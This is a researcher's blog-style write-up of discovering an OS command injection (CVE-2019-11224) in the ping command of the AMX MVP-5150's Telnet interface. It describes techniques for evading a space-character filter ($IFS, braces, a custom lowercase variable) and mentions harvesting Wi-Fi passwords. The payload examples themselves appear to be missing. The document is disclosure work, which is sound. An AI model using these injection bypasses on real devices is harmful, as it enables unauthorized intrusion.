How did I find Command Injection in MVP-5150 (CVE-2019-11224)

This article shows how did I find the CVE-2019-11224 and also introduces three ways to bypass “space” character in Linux OS.
Introduction
OS Command Injection is that the software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralise or incorrectly neutralises special elements that could modify the intended OS command when it is sent to a downstream component.
This article describes that how did I find CVE-2019-11224 and three ways for bypassing “space” character while OS Command Injection.
Environment
An AMX MVP-5150 device with the latest firmware (v2.87.13).
AMX MVP-5150 device has multiple internet interfaces. This means that it is not only able to connect to the internet line cable, but also able to connect to the Wi-Fi network. (In some cases, Wi-Fi password is stored in Linux system without encryption. This means that read the Wi-Fi configure file, we will be able to get the Wi-Fi password)
Find OS Command Injection
After connecting to the MVP-5150 via the Telnet server, I executed ?
to check the command list. Luckily, there was a command called ping
.

Then, I executed the following payload to test if it was vulnerable command injection issue.
|
|

Obviously, there was a command injection issue.
Bypass Space Character
However, MVP-5150 did not support “space” character. For example, if I executed ping 127.0.0.1;ls -ls
, it would execute ping 127.0.0.1;ls
.
We need to create a payload which will exactly equal “space”, but does not include any “space”.
Global Variable
In the Linux system, there are some global variables, such as $HOME
, $USERNAME
etc.
There was a special global variable called $IFS
, it can be used to bypass “space”.

However, in this case, it did not work. Since the device would get all input, and then converted it to lower cases. This means that $IFS
would be converted to $ifs
.
Linux Feature
In some of Linux systems, there was a special way to execute command without “space” character, which was using { }
.

However, in this case, it did not work as well.
Special $IFS
Albeit we cannot use $IFS, we can create our own $IFS and use it to bypass the space character. For example:
|
|
As I mentioned before, the device would convert all input to lower cases. So, we just need to change our $HZ to $hz, it works!

Summary
AMX devices are widely used in multiple places, if a malicious user gain access to the device, the user can use it as a jump-box to perform further attacks.
The CVE detail can be found in this link. The CVE advisory can be found in this link.